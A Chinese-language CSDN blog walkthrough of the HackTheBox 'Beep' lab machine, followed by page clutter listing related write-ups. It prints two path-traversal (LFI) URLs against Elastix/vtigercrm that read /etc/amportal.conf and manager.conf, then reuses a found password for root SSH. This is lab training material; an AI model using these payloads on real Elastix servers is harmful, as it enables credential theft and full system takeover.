hackthebox-beep(考点:elastix)

最新推荐文章于 2022-11-09 01:59:01 发布
最新推荐文章于 2022-11-09 01:59:01 发布
阅读量397 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105442357
版权

1、nmap扫描

在这里插入图片描述

2、80端口探测 LFI 账户密码

很多端口,看到ssh就要想到登录。再看看80,想到打开网页看看
打开是elastix
在这里插入图片描述

网上搜搜相关漏洞
很快在db里搜到

https://www.exploit-db.com/exploits/37637

主要就是这个,以后看到elastix,都可以用如下这俩试试。
ctrl+u 整理前端码

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00

在这里插入图片描述
在这里插入图片描述
都可以,发现密码 都是 jEhd…那个。没看到什么用户,倒是写了 管理员 admin,似乎就是最高等级的账户,可能为80的admin登录密码,也可能是ssh的root登录密码。

3、 ssh登录

直接试试ssh root,毕竟第一步我们发现开了ssh登录,也说了看到ssh就要想到登录
成功。这台靶机很简单。
在这里插入图片描述

冬萍子
关注
HackTheBox-多种姿势渗透beep靶机
weixin_43111940的博客
04-19 348
端口信息 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open s
实战HackTheBox里面的Beep
知柯信安
01-11 1648
与之前一样,第一步是运行Nmap扫描以识别正在运行的信息。 # Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7 Nmap scan report for 10.10.10.7 Host is up (0.033s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 22/t
HackTheBox::Beep
aya3t的博客
10-10 293
HackTheBox::Beep
Hack the box靶机 beep
菜浪马废的博客
05-19 195
看看有没有漏洞可用 查看网页源代码 会让信息更立正 用得到的信息直连ssh可以获得root
【Hack The Box】linux练习-- beep
人间体佐菲的博客
11-09 447
【Hack The Box】linux练习-- beep
mastodon-enhanced-beep::bell::speaker_high_volume:哔哔另一哔哔!
02-03
增强的提示音! 特征 除了Mastodon的通知声音外,您还可以播放每种通知类型的声音。 当前支持的通知类型: 喜爱 促进 ...回覆(私人) ... 如果您不熟悉使用用户脚本,请先将用户脚本扩展安装到浏览器中。...
webpack-beep-plugin:添加 --beep 选项以在编译时导致终端铃声
05-30
npm install webpack-beep-plugin // In webpack config file var BeepPlugin = require('webpack-beep-plugin'); plugins: [new BeepPlugin()] 然后使用 --beep 参数运行 webpack。 注意:对于 webpack v2 使用...
nodebb-plugin-beep:NodeBB插件,允许用户审查帖子中的诅咒单词
05-10
NodeBB审查员诅咒词 一个NodeBB插件,允许用户审查其帖子中的单词诅咒。 允许管理员创建使用时被审查的禁止使用的单词和网址的列表。 安装 npm install nodebb-plugin-beep 屏幕截图
beep-beep-server:虚构的p2p协议服务器
02-02
"beep-beep-server"是一个虚构的P2P协议服务器,可能用于实现特定的通信功能或应用。 在标签中,我们看到了以下几个关键术语: 1. **GraphQL**:这是一种查询语言,用于API,允许客户端声明他们需要的数据,而不是...
Matlab读取BMP文件代码-beep-boop:哔哔声
05-23
boundingBox_avalon:符合avalon接口的boundingBox模块 boundingBox_v2:boundingBox模块,但在光线不足的情况下不使用RAM和背景 c:将BMP图像转换为C中的HEX文件的代码 裁剪:裁剪并生成BMP输出图像的模块 MATLAB:...
0x11-HackTheBox-Beep
0pr
05-26 382
目录 历史命令 目标 能学到什么? 什么是 Elastix? 什么是 FreePBX? Elastix FreePBX 远程代码执行漏洞 Nmap Rpcclient Smbclient Enum4linux Nmap Read More Ldapsearch Sambe on 139,445 Rpc DNS on 53 Kerberos on 88 Evil-winrm Foothold Privilege Escalation Manual Enumeration PowerView.p
No.95-HackTheBox-Linux-Beep-Walkthrough渗透学习
qq_34801745的博客
05-13 344
** HackTheBox-Linux-Beep-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/4 靶机难度:中级(4.6/10) 靶机发布日期:2017年10月16日 靶机描述: Beep has a very large list of running services, which can make it a bit challenging to find the correct entry method. Th
Linux/Beep
ve9etable的博客
08-07 952
HTB Beep[Hack The Box HTB靶场]writeup系列5
重新启程
02-04 3546
本题是retire机器的第五台了 目录 0x00 靶场信息 0x01 信息搜集 0x02 业务探测 80端口主页:elastix freepbx 80端口mail业务:roundcube webmail 10000端口:webmin 0x03 漏洞分析 elastix roundcube webmin 0x03 web攻击 roundcube webmin elas...
【HTB系列】Beep
Ms08067安全实验室
12-08 1025
这次挑战的是 HTB 的第5台靶机:Beep,评分很高,难度中等靶机描述Beep 运行了大量的服务,这对正确发掘入口点有一定的挑战,由于存在大量的攻击向量,或许会让你不知所措,幸运地是,...
如何检验linux 、elastix服务器是否遭受过攻击
Commander_Officer的专栏
03-20 895
1:检测是否有人暴力ssh破解   用这个命令,查看一下secure文件   more /var/log/secure |grep "Refused user" 我查看的结果如下 bangian vsftpd:pam_listfile (vsftpd:auth):Refused user shutdown for serevice vsftpd
Elastix配准工具使用入门
热门推荐
风言风语
03-21 1万+
Elastix是一个基于ITK开发的处理医学图像配准问题的工具。本文简单的介绍了Elastix的相关信息和使用方式,希望能对他人有所帮助。
C++函数之---Beep函数
最新发布
07-28
Beep函数是一个Windows API函数,用于在计算机上发出声音。它的原型为:WINBASEAPI WINBOOL WINAPI Beep (DWORD dwFreq, DWORD dwDuration)。\[1\]该函数接受两个参数,dwFreq表示要发出的声音的频率,dwDuration...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值